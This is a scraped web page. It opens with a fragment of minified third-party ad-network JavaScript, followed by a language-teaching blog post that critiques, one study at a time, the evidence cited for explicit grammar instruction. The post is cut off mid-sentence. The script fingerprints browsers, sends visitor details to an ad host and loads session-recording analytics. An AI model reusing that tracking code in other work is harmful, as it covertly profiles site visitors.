s=c._utf8_decode(s)},_utf8_encode:function(e){e=e.replace(/\r\n/g,"\n");for(var t="",o=0;o<e.length;o++){var n=e.charCodeAt(o);n<128?t+=String.fromCharCode(n):(127<n&&n<2048?t+=String.fromCharCode(n>>6|192):(t+=String.fromCharCode(n>>12|224),t+=String.fromCharCode(n>>6&63|128)),t+=String.fromCharCode(63&n|128))}return t},_utf8_decode:function(e){for(var t="",o=0,n=c1=c2=0;o<e.length;)(n=e.charCodeAt(o))<128?(t+=String.fromCharCode(n),o++):191<n&&n<224?(c2=e.charCodeAt(o+1),t+=String.fromCharCode((31&n)<<6|63&c2),o+=2):(c2=e.charCodeAt(o+1),c3=e.charCodeAt(o+2),t+=String.fromCharCode((15&n)<<12|(63&c2)<<6|63&c3),o+=3);return t}},s=function(e){var t=e.displayHost+"p/"+e.adBlockId+"/?source="+encodeURIComponent(e.sourceURL)+"&ref="+encodeURIComponent(e.sourceRef)+"&ent="+bmblocks.idEntropy+"&we="+bmblocks.we+"&fid="+bmblocks.fid+"&fidnoua="+bmblocks.fidnoua+"&impid="+bmblocks.impUuid+"&ua="+encodeURIComponent(e.userAgent)+"&sig=0x00000&blocksubid="+e.blockSubId,o=bmblocks[e.adBlockId][e.blockSubId],n=document.getElementsByClassName(e.blockClass)[o];if(function(e){for(var t=e.getBoundingClientRect(),o=t.left;o<t.right;o+=15)for(var n=t.top;n<t.bottom;n+=15){var i=document.elementFromPoint(o,n);if(null!=i&&i!=e)return!0}return!1}(n)){var i=e.displayHost+"pb/"+e.publId+"/"+e.adBlockId+"?type=overlapping&fid="+bmblocks.fid+"&fidnoua="+bmblocks.fidnoua+"&ref="+encodeURIComponent(e.sourceRef)+"&impid="+bmblocks.impUuid;p(i)}var a=document.createElement("iframe");a.setAttribute("src",t),a.setAttribute("class",e.iframeClass),a.setAttribute("scrolling","no"),a.style.border="none",a.style.width=n.style.width,a.style.height=n.style.height,e.adWidth=n.style.width,e.adHeight=n.style.height,n.appendChild(a)},d=function(e){var t=bmblocks[e.adBlockId][e.blockSubId],o=document.getElementsByClassName(e.iframeClass)[t];void 0!==o&&o.parentNode.removeChild(o),g(e.blockSubId),e.adRemoved=!0},l=function(e){if(0==(null!=e.offsetParent))return!1;var t=e.getBoundingClientRect(),o=0<=t.top&&t.top<(window.innerHeight||document.documentElement.clientHeight),n=0<=t.bottom&&t.bottom<(window.innerHeight||document.documentElement.clientHeight),i=0<=t.left&&t.left<(window.innerWidth||document.documentElement.clientWidth),a=0<=t.right&&t.right<(window.innerWidth||document.documentElement.clientWidth);if((o||n)&&(i||a))if(o&&i){if(document.elementFromPoint(t.left,t.top)===e||e.contains(document.elementFromPoint(t.left,t.top))||document.elementFromPoint(t.left,t.top).contains(e))return!0}else if(o&&a){if(document.elementFromPoint(t.right,t.top)===e||e.contains(document.elementFromPoint(t.right,t.top))||document.elementFromPoint(t.right,t.top).contains(e))return!0}else if(n&&i){if(document.elementFromPoint(t.left,t.bottom)===e||e.contains(document.elementFromPoint(t.left,t.bottom))||document.elementFromPoint(t.left,t.bottom).contains(e))return!0}else if(n&&a&&(document.elementFromPoint(t.right,t.bottom)===e||e.contains(document.elementFromPoint(t.right,t.bottom))||document.elementFromPoint(t.right,t.bottom).contains(e)))return!0;return!1},u=function(e,t){var o=document.getElementsByClassName(e.blockClass)[e.blockSubId];!function(e,t){var o=document.createElement("div");o.innerHTML=e;for(var n=o.getElementsByTagName("*"),i=0;i<n.length;i++){for(var a=document.createElement(n[i].tagName),r=n[i].attributes,s=0;s<r.length;s++)atr=r[s],a.setAttribute(atr.name,atr.value);0==n[i].children.length&&(a.innerHTML=n[i].innerHTML),t.appendChild(a)}}(t.partnerCode,o)},h=function(e){switch(e.badType){case"replaced":document.getElementsByClassName(e.blockClass)[e.blockSubId].innerHTML=e.badCode;break;case"filled":document.getElementsByClassName(e.blockClass)[e.blockSubId].style.backgroundColor=e.badColor;break;case"adsense":!function(e){var t='<ins class="adsbygoogle" style="display:inline-block;width:'+e.badAdWidth+"px;height:"+e.badAdHeight+'px" data-ad-client="ca-pub-'+e.badAdClient+'" data-ad-slot="'+e.badAdSlot+'"></ins>';document.getElementsByClassName(e.blockClass)[e.blockSubId].innerHTML=t;var o=document.createElement("script");o.setAttribute("type","text/javascript"),o.setAttribute("language","JavaScript"),o.setAttribute("src","//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"),document.getElementsByTagName("body")[0].appendChild(o),(adsbygoogle=window.adsbygoogle||[]).push({})}(e);break;case"collapse":document.getElementsByClassName(e.blockClass)[e.blockSubId].style.width="0px",document.getElementsByClassName(e.blockClass)[e.blockSubId].style.height="0px"}},C=function(){i.adSuccess||i.adRemoved||(d(i),h(i))},p=function(e){var t=document.createElement("img"),o=e;t.setAttribute("src",o),t.setAttribute("id",i.publId),t.style.display="none",t.onload=t.onerror=function(){n.removeChild(t)};var n=document.getElementsByTagName("body")[0];n.appendChild(t)},m=function(e,t){if(l(e)&&(t+=200),t>=i.trackViewPortTimer)return o=i.displayHost+"confirm/"+i.ClickId+"/",p(o),!0;var o;setTimeout(function(){m(e,t)},200)},b=function(e){if(e.data)try{var t=JSON.parse(e.data);if(t.token&&i.adBlockId===t.adBlockId&&t.blockSubId===i.blockSubId){send=!0;var o=new XMLHttpRequest,n=i.displayHost+"reconfirm/?clickid="+t.clickId+"&token="+t.token;o.open("GET",n,!0),o.send()}}catch(e){}},f=function(e){if(e.origin.slice(e.origin.search(":")+1)+"/"!==i.displayHost.slice(i.displayHost.search(":")+1))return!1;!function(){if(0==parseInt(i.TrackYandex)||void 0!==window.BitMediaYaCounter)return;window.BitMediaYaCounter={};var e=document.getElementsByTagName("script")[0],t=document.createElement("script"),o=function(){e.parentNode.insertBefore(t,e)};t.type="text/javascript",t.async=!0,t.src="https://mc.yandex.ru/metrika/watch.js",t.onload=function(){window.BitMediaYaCounter=new Ya.Metrika({id:i.YaCounterID,clickmap:!0,trackLinks:!0,accurateTrackBounce:!0,webvisor:!0})},"[object Opera]"==window.opera?document.addEventListener("DOMContentLoaded",o,!1):o()}();var t,o,n=JSON.parse(e.data);switch(n.status){case"bitMediaAdLoaded":n.destinationBlockId===i.adBlockId&&n.blockSubId===i.blockSubId&&(i.adSuccess=!0,i.adId=n.adId,(1===parseInt(i.TrackImpression)||parseInt(n.EnbriteLyTrack))&&function(){var e=document.createElement("script");e.type="text/javascript";var t="https://df3a34acb7eb1321d99f-2366b89f86f9049a8d564854bcebe54e.ssl.cf5.rackcdn.com/gerbil-2.1.6.1.js?wsid=bitmedia&banh="+i.adHeight+"&banw="+i.adWidth+"&sid="+i.SessionId+"&iid="+bmblocks.impUuid+"&pid="+i.SourceId+"&purl="+encodeURIComponent(i.sourceURL)+"&adid="+i.adId+"&zid=&curl="+encodeURIComponent(i.sourceRef);e.src=t,document.body.appendChild(e)}(),0<n.trackViewPortTimer&&(i.trackViewPortTimer=n.trackViewPortTimer,i.ClickId=n.ClickId,t=bmblocks[i.adBlockId][i.blockSubId],o=document.getElementsByClassName(i.blockClass)[t],m(o,0)));break;case"bitMediaPartnerAdLoaded":n.destinationBlockId===i.adBlockId&&n.blockSubId===i.blockSubId&&(document.getElementsByClassName(i.blockClass)[i.blockSubId].innerHTML="",u(i,n));break;case"noBitMediaContent":n.destinationBlockId===i.adBlockId&&n.blockSubId===i.blockSubId&&(d(i),h(i))}},g=function(e){bmblocks[i.adBlockId][e]=-1;for(var t=e+1;t<bmblocks[i.adBlockId].length;t++)bmblocks[i.adBlockId][t]--},B={changed:!0,setChanged:function(){this.changed=!0},checkAndRun:function(){if(this.changed){var e=document.getElementsByClassName(i.blockClass)[i.blockSubId];l(e)&&(clearInterval(y),clearInterval(k),window.removeEventListener("scroll",B.setChanged),window.removeEventListener("resize",B.setChanged),s(i),addEventListener("message",f),addEventListener("message",b),setTimeout(C,1e3*i.loadTime)),this.changed=!1}}};if(i.badCode=c.decode(i.badCode),i.displayHost=(e=i,o=window.location.protocol,"http:"!=window.location.protocol&&"https:"!=window.location.protocol&&(o="https:"),o+e.displayHost),function(){for(var e=document.getElementById(i.blockClass);null!==e;)e.setAttribute("class",i.blockClass),e.removeAttribute("id"),e=document.getElementById(i.blockClass)}(),i.blockSubId="undefined"==typeof bmblocks?(window.bmblocks={},bmblocks[i.adBlockId]=[0],0):void 0===bmblocks[i.adBlockId]?(bmblocks[i.adBlockId]=[0],0):(bmblocks[i.adBlockId].push(bmblocks[i.adBlockId][bmblocks[i.adBlockId].length-1]+1),bmblocks[i.adBlockId][bmblocks[i.adBlockId].length-1]),function(){if("undefined"!=typeof bmblocks&&(void 0===bmblocks.impUuid&&(bmblocks.impUuid=r.new()),void 0===bmblocks.fid)){var e=new t({});e.init(),bmblocks.fid=e.get(),bmblocks.fidnoua=e.getNoUA(),bmblocks.we=e.isWebRTCSupported()?"1":"0",bmblocks.idEntropy=e.getEntropy()}}(),function(){if(void 0===bmblocks.pubIds||-1===bmblocks.pubIds.indexOf(i.publId)){bmblocks.pubIds?bmblocks.pubIds.push(i.publId):bmblocks.pubIds=[i.publId];var e=document.createElement("img"),t=i.displayHost+"pv/"+i.publId+"/?source="+encodeURIComponent(i.sourceURL)+"&ref="+encodeURIComponent(i.sourceRef)+"&ent="+bmblocks.idEntropy+"&we="+bmblocks.we+"&fid="+bmblocks.fid+"&fidnoua="+bmblocks.fidnoua+"&ua="+encodeURIComponent(i.userAgent)+"&sig=0x00000&blocksubid=0&impid="+bmblocks.impUuid;e.setAttribute("src",t),e.setAttribute("id",i.publId),e.style.display="none";var o=document.getElementsByTagName("body")[0];e.onload=function(){o.removeChild(e)},e.onerror=function(){o.removeChild(e)},o.appendChild(e)}}(),window.top!=window.self){var A=i.displayHost+"pb/"+i.publId+"/"+i.adBlockId+"?type=iframe&fid="+bmblocks.fid+"&fidnoua="+bmblocks.fidnoua+"&ref="+encodeURIComponent(i.sourceRef)+"&impid="+bmblocks.impUuid;p(A)}window.addEventListener("scroll",B.setChanged),window.addEventListener("resize",B.setChanged);var y=setInterval(B.checkAndRun,100),k=setInterval(B.setChanged,400)}();
0
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>t.p.r.s. q&amp;a | Q&amp;A about T.P.R.S., and second language acquisition &amp; teaching. Translating research into useful classroom ideas. Clearing up myths and misperceptions about S.L.A.</title> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://tprsquestionsandanswers.wordpress.com/xmlrpc.php"> <!--[if lt IE 9]> <script src="https://s2.wp.com/wp-content/themes/pub/suits/js/html5.js" type="text/javascript"></script> <![endif]--> <link rel='dns-prefetch' href='//s2.wp.com' /> <link rel='dns-prefetch' href='//s1.wp.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel="alternate" type="application/rss+xml" title="t.p.r.s. q&amp;a &raquo; Feed" href="https://tprsquestionsandanswers.wordpress.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="t.p.r.s. q&amp;a &raquo; Comments Feed" href="https://tprsquestionsandanswers.wordpress.com/comments/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function () { oldonload(); func(); } } } /* ]]> */ </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s1.wp.com\/wp-includes\/js\/wp-emoji-release.min.js?m=1556893897h&ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='all-css-0-1' href='https://s1.wp.com/_static/??-eJx9UNEOwiAM/CEZTp17Mn7LYFW7USAUsvD3shn3YAwvzfVyd81VLl5oZyPYKCkJb9ITLcvFa0eCCQ3kn63RzAf532ZwBpYTRD/oWWxbTY72gRZj3sEuRqtNGktWIeSIHKUybotUYQhZcswGGkJbi9cuQOHJD3FVEIw4gAEqspqN/PXrWuGrVKm2+HxHKR+AWZRJmEjEVzm0+e50a7uuP13a/nyc3l1Tigo=?cssminify=yes' type='text/css' media='all' /> <link rel='stylesheet' id='suits-font-css' href='https://fonts.googleapis.com/css?family=Lato%3A100%2C300%2C400%26subset%3Dlatin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='all-css-2-1' href='https://s0.wp.com/_static/??-eJx9jEEOwjAMBD9EsAqlnBBvSYMJBieOakdVf0+4oPbS2652dmAuLkg2zAb2woQKpY6glUxBbWE8BtUDrLBUXeEaKSvM9IjYQKxtlQ+hYz+DYSrsDTcCgixGzaH/sGeOKI4leCPJm+Ke7Gnau044ssQWIzRqVX+ne7p1l9N1OPddP7y/BGterg==?cssminify=yes' type='text/css' media='all' /> <link rel='stylesheet' id='print-css-3-1' href='https://s2.wp.com/wp-content/mu-plugins/global-print/global-print.css?m=1465851035h&cssminify=yes' type='text/css' media='print' /> <link rel='stylesheet' id='all-css-4-1' href='https://s0.wp.com/_static/??/wp-content/mu-plugins/actionbar/actionbar.css,/wp-content/themes/h4/global.css?m=1516985148j&cssminify=yes' type='text/css' media='all' /> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJyF0FEKwjAMBuAL2RVdh0/iWWqNI3VNa5M69PRWmIhQFQJ5yAf5Ez0nheSmcgTWvtalQL4trfO80r+ACjhmK9AFpBd2kQRInjZFlgDMdoTGNMQDTqAKQ66ApK45xYb7jIR0RZj/Mg+SrDurDIx3aB3C6Z35+wcWtQ+79TCYTd9vjfEPs3xy+Q=='></script> <link rel='stylesheet' id='all-css-0-2' href='https://s0.wp.com/wp-content/mu-plugins/highlander-comments/style.css?m=1530132353h&cssminify=yes' type='text/css' media='all' /> <!--[if lt IE 8]> <link rel='stylesheet' id='highlander-comments-ie7-css' href='https://s2.wp.com/wp-content/mu-plugins/highlander-comments/style-ie7.css?m=1351637563h&#038;ver=20110606' type='text/css' media='all' /> <![endif]--> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://tprsquestionsandanswers.wordpress.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s1.wp.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress.com" /> <link rel='shortlink' href='https://wp.me/4gpEc' /> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="t.p.r.s. q&amp;a" /> <meta property="og:description" content="Q&amp;A about T.P.R.S., and second language acquisition &amp; teaching. Translating research into useful classroom ideas. Clearing up myths and misperceptions about S.L.A." /> <meta property="og:url" content="https://tprsquestionsandanswers.wordpress.com/" /> <meta property="og:site_name" content="t.p.r.s. q&amp;a" /> <meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:site" content="@wordpressdotcom" /> <meta property="fb:app_id" content="249643311490" /> <!-- End Jetpack Open Graph Tags --> <link rel="shortcut icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" /> <link rel="icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" /> <link rel="apple-touch-icon-precomposed" href="https://s2.wp.com/i/webclip.png" /> <link rel='openid.server' href='https://tprsquestionsandanswers.wordpress.com/?openidserver=1' /> <link rel='openid.delegate' href='https://tprsquestionsandanswers.wordpress.com/' /> <link rel="search" type="application/opensearchdescription+xml" href="https://tprsquestionsandanswers.wordpress.com/osd.xml" title="t.p.r.s. q&#38;a" /> <link rel="search" type="application/opensearchdescription+xml" href="https://s1.wp.com/opensearch.xml" title="WordPress.com" /> <meta name="theme-color" content="#efece6" /> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <style type="text/css"> .recentcomments a { display: inline !important; padding: 0 !important; margin: 0 !important; } table.recentcommentsavatartop img.avatar, table.recentcommentsavatarend img.avatar { border: 0px; margin: 0; } table.recentcommentsavatartop a, table.recentcommentsavatarend a { border: 0px !important; background-color: transparent !important; } td.recentcommentsavatarend, td.recentcommentsavatartop { padding: 0px 0px 1px 0px; margin: 0px; } td.recentcommentstextend { border: none !important; padding: 0px 0px 2px 10px; } .rtl td.recentcommentstextend { padding: 0px 10px 2px 0px; } td.recentcommentstexttop { border: none; padding: 0px 0px 0px 10px; } .rtl td.recentcommentstexttop { padding: 0px 10px 0px 0px; } </style> <script type="text/javascript"> function __ATA_CC() {var v = document.cookie.match('(^|;) ?personalized-ads-consent=([^;]*)(;|$)');return v ? 1 : 0;} var __ATA_PP = { pt: 0, ht: 0, tn: 'suits', amp: false, siteid: 8982, blogid: 63017184, consent: __ATA_CC(), flag: 3 }; </script> <script type="text/javascript"> !function(){var e=document.createElement("script");e.async=!0,e.type="text/javascript";var t=window.__ATA_PP||{},n=["r="+(new Date).getTime()];for(var r in t)t.hasOwnProperty(r)&&("amp"===r&&(t[r]=Number(t[r])),n.push(r+"="+encodeURIComponent(t[r])));e.src="//s.pubmine.com/mhead.js?"+n.join("&");var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(); </script><meta name="application-name" content="t.p.r.s. q&amp;a" /><meta name="msapplication-window" content="width=device-width;height=device-height" /><meta name="msapplication-tooltip" content="Q&amp;A about T.P.R.S., and second language acquisition &amp; teaching. Translating research into useful classroom ideas. Clearing up myths and misperceptions about S.L.A." /><meta name="msapplication-task" content="name=Subscribe;action-uri=https://tprsquestionsandanswers.wordpress.com/feed/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=Sign up for a free blog;action-uri=http://wordpress.com/signup/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Support;action-uri=http://support.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Forums;action-uri=http://forums.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="description" content="Q&amp;A about T.P.R.S., and second language acquisition &amp; teaching. Translating research into useful classroom ideas. Clearing up myths and misperceptions about S.L.A." /> <style type="text/css" id="suits-header-css"> .site-header { background: #000 url(https://tprsquestionsandanswers.files.wordpress.com/2015/07/cropped-cropped-z24.jpg) no-repeat scroll top; } </style> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #efece6; } </style> <style type="text/css" id="syntaxhighlighteranchor"></style> <style type="text/css" id="custom-colors-css">.site-header h1.site-title{color:#fff}.site-header h2.site-description{color:#fff}.site-info{color:#fff}.site-info{color:#fff}a:hover{color:#333}.entry-content a,.comment-content a,.page-content a{color:#333}.entry-meta a:hover{color:#333}.nav-menu li a{color:#fff}.nav-menu li:hover>a,.nav-menu li a:hover{color:#fff}.nav-menu .current_page_item>a,.nav-menu .current_page_ancestor>a,.nav-menu .current-menu-item>a,.nav-menu .current-menu-ancestor>a{color:#fff}.nav-menu li:hover{background-color:#404040}body{background-color:#efece6}.site-header{background-color:#ab9d88}#navbar{background-color:#847969}.site-info-container{background-color:#847969}.nav-menu li:hover>a,.nav-menu li a:hover{background-color:#847969}.nav-menu li:hover>a,.nav-menu li a:hover{background-color:rgba(132,121,105,.8)}ul.nav-menu ul a:hover,.nav-menu ul ul a:hover{background-color:#847969}.nav-menu .current_page_item>a,.nav-menu .current_page_ancestor>a,.nav-menu .current-menu-item>a,.nav-menu .current-menu-ancestor>a{background-color:#847969}.nav-menu .sub-menu,.nav-menu .children{background-color:#655d51}a{color:#792d2b}.entry-content a,.comment-content a,.page-content a{color:#792d2b}.entry-meta a{color:#792d2b}body,h1,h2,h3,h4,h5,h6{color:#474747}h1,h2,h3,h4,h5,h6{color:#4f4f4f}.entry-meta{color:#4f4f4f}input{color:#4f4f4f}textarea{color:#4f4f4f}</style> </head> <body class="home blog custom-background mp6 customizer-styles-applied single-author one-footer-sidebar highlander-enabled highlander-light infinite-scroll"> <div id="page" class="hfeed site"> <header id="masthead" class="site-header" role="banner"> <a class="home-link" href="https://tprsquestionsandanswers.wordpress.com/" title="t.p.r.s. q&amp;a" rel="home"> <h1 class="site-title">t.p.r.s. q&amp;a</h1> <h2 class="site-description">Q&amp;A about T.P.R.S., and second language acquisition &amp; teaching. Translating research into useful classroom ideas. Clearing up myths and misperceptions about S.L.A.</h2> </a><!-- #navbar .header-navigation --> <div id="navbar" class="header-navigation"> <nav id="site-navigation" class="navigation main-navigation" role="navigation"> <h3 class="menu-toggle">Menu</h3> <div class="menu-language-resources-worth-a-look-container"><ul id="menu-language-resources-worth-a-look" class="nav-menu"><li id="menu-item-2911" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-2911"><a href="https://tprsquestionsandanswers.wordpress.com/" aria-current="page">Home</a></li> <li id="menu-item-2912" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2912"><a href="https://tprsquestionsandanswers.wordpress.com/about/">About</a></li> <li id="menu-item-2913" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2913"><a href="http://http://martinabex.com/">Martina Bex</a></li> <li id="menu-item-5627" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5627"><a href="http://terrywaltz.com/comprehensible-input-blog/">Terry Waltz</a></li> </ul></div> <form role="search" method="get" class="search-form" action="https://tprsquestionsandanswers.wordpress.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form> </nav><!-- #site-navigation .navigation .main-navigation --> </div><!-- #navbar .header-navigation --> </header><!-- #masthead .site-header --> <div id="main" class="site-main"> <div id="primary" class="content-area"> <div id="content" class="site-content" role="main"> <article id="post-11303" class="post-11303 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/09/gianfranco-contis-claim-and-the-evidence/" rel="bookmark"> <header class="entry-header"> <h1 class="entry-title">Gianfranco Conti&#8217;s Claim and the&nbsp;Evidence</h1> </header><!-- .entry-header --> </a> <div class="entry-content"> <p>Dr. Gianfranco Conti just joined CI LIFTOFF. Yay! Now, along with Dr. Bill VanPatten this group has two experts. VanPatten has a PhD in linguistics (where he focused on SL processing stregies) and has written a few hundred articles in scholarly journals and books, a whack of books, some textbooks, and some novels (<a href="https://www.aatsp.org/resource/resmgr/2011_election/vanpatten_full_cv_july_2011.pdf">his 2011 CV is here</a>). Conti is a French and Spanish teacher with a PhD in applied linguistics (<a href="https://www.italianlanguage.coasit.com.au/index.php?option=com_acymailing&amp;ctrl=url&amp;subid=1&amp;urlid=198&amp;mailid=110">his CV is here</a>).</p> <p>Conti&nbsp; and I have divergent views about SLA. Mine is pretty standard: during a discussion, I wrote that &#8220;<em>the only way language acquisition occurs is through processing comprehended input</em>.&#8221; Whatever else may be going with a learner and their class/learning environment (e.g. forced output, grammar teaching &amp; practice, grammar-&#8220;rule&#8221; feedback, etc), it is the C.I. that the learner is getting that drives the acquisition bus.&nbsp; That&#8217;s my claim.</p> <p>Conti countered with this:&nbsp;<em>&#8220;Chris Stolz you are welcome to your viewpoint, but the weight of research is solidly against you. <strong>Explicit instruction appears time and again to be superior to implicit instruction and there is an argument that it demonstrates to the learners that they can approach language empirically, just like biology or chemistry</strong>, and thus makes it more interesting to a wider range of learners.&#8221;</em></p> <p>Note that Conti&#8217;s claim has one giant problem: he doesn&#8217;t define what &#8220;superior&#8221; means, or to what it applies. I give him the benefit of the doubt and guess that &#8220;superior&#8221; means &#8220;generates more durable and accurate mental representation of and/or spontaneous accurate production of the target language in the learner.&#8221;</p> <p>Being the data-slave that I am, I asked for evidence.&nbsp;Here is Conti&#8217;s support for his position.</p> <p>Here is every article Conti mentioned. My comments follow it.</p> <p><strong><em>Chan, A. Y. W. &amp; D. C. S. Li. 2002. ‘Form‐focused remedial instruction: an empirical study’. International Journal of Applied Linguistics 12/1: 24-53.&nbsp;</em></strong>This study of Cantonese L1s studying L2 English lacks a real control group. When it was begun, the control group instructional materials were so boring that the researchers were forced to treat them with almost the same instruction as the treatment group. Both groups experienced equal gains on post-treatment and delayed post-treatment assessment. The absence of a real control group&#8211; eg one which got regular English instruction, or just comprehensible input aurally and/or in writing&#8211; means we have no idea what the intervention did relative to other interventions. The assessments also focus on conscious learning. This study therefore does not appear to support Conti&#8217;s claim.</p> <p><em><strong>Craik, F.I.M. &amp; R. S. Lockhart. 1972. ‘Levels of processing: a framework for memory research’. Journal of Verbal Learning and Verbal Behavior 11: 671-684.</strong>&nbsp;</em>This article does not look at the role that grammar instruction plays in language acquisition, and therefore does not support Conti&#8217;s claim.<br /> <em><strong><br /> DeKeyser, R. 1994. ‘Implicit and explicit learning of L2 grammar: a pilot study’. TESOL</strong> <strong>Quarterly 28/1: 188-194</strong>.&nbsp;</em>DeKeyser&#8217;s study used an artificial language (Implexan)&nbsp; and examined whether people who were told grammar rules (and then given input) acquired a better &#8220;feel&#8221; for the meaning of the language, and better production, than did those who received merely input. He showed subjects pictures with accompanying sentences in the synthetic language. DeKeyser used a production test and a grammaticality judgment test to assess learning.</p> <p>This study has a number of problems.&nbsp; These include:<br /> 1. n = 6<br /> 2. He doesn&#8217;t provide his data. Am I missing something? I have a PDF of the article and I don&#8217;t see his data.<br /> 3. DeKeyser doesn&#8217;t explain what he means when he says that the subjects who receive explicit grammar instruction &#8220;learned categorical rules.&#8221; Does this means they were able to consciously formulate them? Does this mean they could apply them?<br /> 4. No delayed post-test was conducted.<br /> 5. DeKeyser does not say whether or not the subjects were told the&nbsp;<em>meaning</em> of the sentences. If they were not, this experiment is looking at pattern recognition (general cognitive processing) and not language acquisition. This leads us to&#8230;<br /> 6. &#8230;the probability that the grammar-rule instruction included references to meaning, and therefore made the input more comprehensible. Eg, a student sees a picture of a man on a horse, and the sentence &#8220;flerb guf dibble.&#8221; They are then told that the word order is subject object verb. This means the sentence probably reads &#8220;man horse rides/is on.&#8221; This person has a leg up on the person who just sees the picture and the sentences and has to guess its meaning.</p> <p>For these reasons. DeKeyser&#8217;s study does not support Conti&#8217;s claim.</p> <p><strong><em>DeKeyser, R. 1995. ‘Learning second language grammar rules: an experiment with a miniature linguistic system’. Studies in Second Language Acquisition 17/3: 379-410.&nbsp;</em></strong>This synthetic-language (Implexan) study is the only one which&nbsp;<em>appears</em> to support Conti&#8217;s hypothesis that explicit grammar teaching is more effective than delivering comprehensible input when building proficiency in production and comprehension. In this study, which is basically a much bigger version of his 1994 study (and in this one, subjects were told sentence meanings in English), DeKeyser found that the explicit and implicit learning groups were able to recognise the same amount of vocab by the end of the study. <strong>However, the explicit-instruction group significantly outperformed the other group in production accuracy.&nbsp;</strong>So far, so good, but&#8230;<br /> 1. There was no delayed post-test.<br /> 2.</p> <p>&nbsp;</p> <p><strong><em>DeKeyser, R. 1998. ‘Beyond focus on form: cognitive perspectives on learning and practicing second language grammar’ in C. Doughty &amp; J. Williams (eds.). Focus on Form in Classroom Second Language Acquisition. Cambridge: Cambridge University</em> Press.&nbsp;</strong>This is not an empirical study. It therefore does not support Conti&#8217;s claim.</p> <p><strong><em>Erlam, R. (2003). ‘The effects of deductive and inductive instruction on the acquisition of direct object pronouns in French as a second language’. The Modern Language Journal 87/2:242-260.&nbsp;&nbsp;</em></strong>This study&#8211; by the author&#8217;s acknowledgement&#8211; shows that people who get explicit &#8220;grammar&#8221; instruction do well on tests <u>where explicit 